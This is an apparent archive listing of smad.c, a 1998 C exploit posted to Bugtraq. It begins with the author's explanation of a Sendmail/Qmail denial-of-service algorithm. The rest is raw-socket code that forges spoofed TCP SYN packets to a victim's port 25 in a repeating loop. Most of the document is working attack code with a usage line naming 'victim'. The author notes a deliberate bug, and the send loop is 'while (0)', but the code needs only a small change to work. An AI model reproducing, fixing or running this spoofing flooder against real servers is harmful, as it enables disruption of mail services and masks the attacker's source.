home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / files / c_scripts / smad.c < prev    next >
Encoding:
C/C++ Source or Header  |  1998-11-04  |  6.2 KB  |  211 lines
  1. /*
  2. Date: Tue, 3 Nov 1998 11:35:31 +0100
  3. From: Salvatore Sanfilippo <antirez@SECLAB.COM>
  4. To: BUGTRAQ@netspace.org
  5. Subject: Sendmail/Qmail DoS
  6.  
  7. Hi,
  8. This expolit shows how Sendmail and Qmail vulnerabilities can be
  9. exploited through spoofed packets. In fact the simple algorithm proposed by
  10. Michal Zalewski can be performed in this way:
  11.  
  12. 1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHOST     (victim sends SYN/ACK to SPOOFHOST)
  13. 2. SPOOFHOST sends RST from port X to victim, dst_port=25 respecting sequence      numbers (in reply to the SYN/ACK from victim).
  14.    (victim got error on accept() - and enters 5 sec 'refusingconn' mode)
  15. 3. Wait approx. 2 seconds
  16. 4. Go to 1.
  17.  
  18. The source is for Linux and there is a little bug so it doesn't work.
  19.  
  20. p.s. This DoS works only against Linux boxes because Linux accept() returns
  21.      a different errno.
  22.  
  23. anti.
  24.  
  25. --
  26. Salvatore Sanfilippo
  27. Intesis SECURITY LAB            Phone: +39-2-671563.1
  28. Via Settembrini, 35             Fax: +39-2-66981953
  29. I-20124 Milano  ITALY           Email: antirez@seclab.com
  30.  
  31. ---------------------------------------------------------
  32. */
  33.  
  34. /*
  35.  * smad.c - sendmail accept dos -
  36.  *
  37.  * Salvatore Sanfilippo [AntireZ]
  38.  * Intesis SECURITY LAB            Phone: +39-2-671563.1
  39.  * Via Settembrini, 35             Fax: +39-2-66981953
  40.  * I-20124 Milano  ITALY           Email: antirez@seclab.com
  41.  *                                         md5330@mclink.it
  42.  *
  43.  * compile it under Linux with gcc -Wall -o smad smad.c
  44.  *
  45.  * usage: smad fakeaddr victim [port]
  46.  */
  47.  
  48. #include <unistd.h>
  49. #include <string.h>
  50. #include <stdio.h>
  51. #include <stdlib.h>
  52. #include <arpa/inet.h>
  53. #include <sys/types.h>
  54. #include <sys/socket.h>
  55. #include <netinet/tcp.h>
  56. #include <netinet/ip.h>
  57. #include <netinet/in.h>
  58. #include <netdb.h>
  59. #include <unistd.h>
  60.  
  61. #define SLEEP_UTIME 100000 /* modify it if necessary */
  62.  
  63. #define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr))
  64. #define OFFSETTCP  (sizeof(struct iphdr))
  65. #define OFFSETIP   (0)
  66.  
  67. u_short cksum(u_short *buf, int nwords)
  68. {
  69.         unsigned long sum;
  70.         u_short *w = buf;
  71.  
  72.         for (sum = 0; nwords > 0; nwords-=2)
  73.                 sum += *w++;
  74.  
  75.         sum = (sum >> 16) + (sum & 0xffff);
  76.         sum += (sum >> 16);
  77.         return ~sum;
  78. }
  79.  
  80. void resolver (struct sockaddr * addr, char *hostname, u_short port)
  81. {
  82.         struct  sockaddr_in *address;
  83.         struct  hostent     *host;
  84.  
  85.         address = (struct sockaddr_in *)addr;
  86.  
  87.         (void) bzero((char *)address, sizeof(struct sockaddr_in));
  88.         address->sin_family = AF_INET;
  89.         address->sin_port = htons(port);
  90.         address->sin_addr.s_addr = inet_addr(hostname);
  91.  
  92.         if ( (int)address->sin_addr.s_addr == -1) {
  93.                 host = gethostbyname(hostname);
  94.                 if (host) {
  95.                         bcopy( host->h_addr,
  96.                         (char *)&address->sin_addr,host->h_length);
  97.                 } else {
  98.                         perror("Could not resolve address");
  99.                         exit(-1);
  100.                 }
  101.         }
  102. }
  103.  
  104. int main(int argc, char **argv)
  105. {
  106.         char runchar[] = "|/-\\";
  107.         char packet[PACKETSIZE],
  108.         *fromhost,
  109.         *tohost;
  110.  
  111.         u_short fromport        = 3000,
  112.                 toport          = 25;
  113.  
  114.         struct sockaddr_in local, remote;
  115.         struct iphdr    *ip     = (struct iphdr*)  (packet + OFFSETIP);
  116.         struct tcphdr   *tcp    = (struct tcphdr*) (packet + OFFSETTCP);
  117.  
  118.         struct  tcp_pseudohdr
  119.         {
  120.                 struct in_addr saddr;
  121.                 struct in_addr daddr;
  122.                 u_char zero;
  123.                 u_char protocol;
  124.                 u_short lenght;
  125.                 struct tcphdr tcpheader;
  126.         } pseudoheader;
  127.  
  128.         int sock, result, runcharid = 0;
  129.  
  130.         if (argc < 3)
  131.         {
  132.                 printf("usage: %s fakeaddr victim [port]\n", argv[0]);
  133.                 exit(0);
  134.         }
  135.         if (argc == 4)
  136.                 toport = atoi(argv[3]);
  137.  
  138.         bzero((void*)packet, PACKETSIZE);
  139.         fromhost = argv[1];
  140.         tohost = argv[2];
  141.  
  142.         resolver((struct sockaddr*)&local, fromhost, fromport);
  143.         resolver((struct sockaddr*)&remote, tohost, toport);
  144.  
  145.         sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  146.         if (sock == -1) {
  147.                 perror("can't get raw socket");
  148.                 exit(1);
  149.         }
  150.  
  151.         /* src addr */
  152.         bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr));
  153.         /* dst addr */
  154.         bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr));
  155.  
  156.         ip->version = 4;
  157.         ip->ihl     = sizeof(struct iphdr)/4;
  158.         ip->tos     = 0;
  159.         ip->tot_len = htons(PACKETSIZE);
  160.         ip->id      = htons(getpid() & 255);
  161.         /* no flags */
  162.         ip->frag_off = 0;
  163.         ip->ttl     = 64;
  164.         ip->protocol = 6;
  165.         ip->check   = 0;
  166.  
  167.         tcp->th_dport = htons(toport);
  168.         tcp->th_sport = htons(fromport);
  169.         tcp->th_seq   = htonl(32089744);
  170.         tcp->th_ack   = htonl(0);
  171.         tcp->th_off   = sizeof(struct tcphdr)/4;
  172.         /* 6 bit reserved */
  173.         tcp->th_flags = TH_SYN;
  174.         tcp->th_win   = htons(512);
  175.  
  176.         /* start of pseudo header stuff */
  177.         bzero(&pseudoheader, 12+sizeof(struct tcphdr));
  178.         pseudoheader.saddr.s_addr=local.sin_addr.s_addr;
  179.         pseudoheader.daddr.s_addr=remote.sin_addr.s_addr;
  180.         pseudoheader.protocol = 6;
  181.         pseudoheader.lenght = htons(sizeof(struct tcphdr));
  182.         bcopy((char*) tcp, (char*) &pseudoheader.tcpheader,
  183.                 sizeof(struct tcphdr));
  184.         /* end */
  185.  
  186.         tcp->th_sum   = cksum((u_short *) &pseudoheader,
  187.                                 12+sizeof(struct tcphdr));
  188.         /* 16 bit urg */
  189.  
  190.         while (0)
  191.         {
  192.                 result = sendto(sock, packet, PACKETSIZE, 0,
  193.                         (struct sockaddr *)&remote, sizeof(remote));
  194.                 if (result != PACKETSIZE)
  195.                 {
  196.                         perror("sending packet");
  197.                         exit(0);
  198.                 }
  199.                 printf("\b");
  200.                 printf("%c", runchar[runcharid]);
  201.                 fflush(stdout);
  202.                 runcharid++;
  203.                 if (runcharid == 4)
  204.                         runcharid = 0;
  205.                 usleep(SLEEP_UTIME);
  206.         }
  207.  
  208.         return 0;
  209. }
  210.  
  211.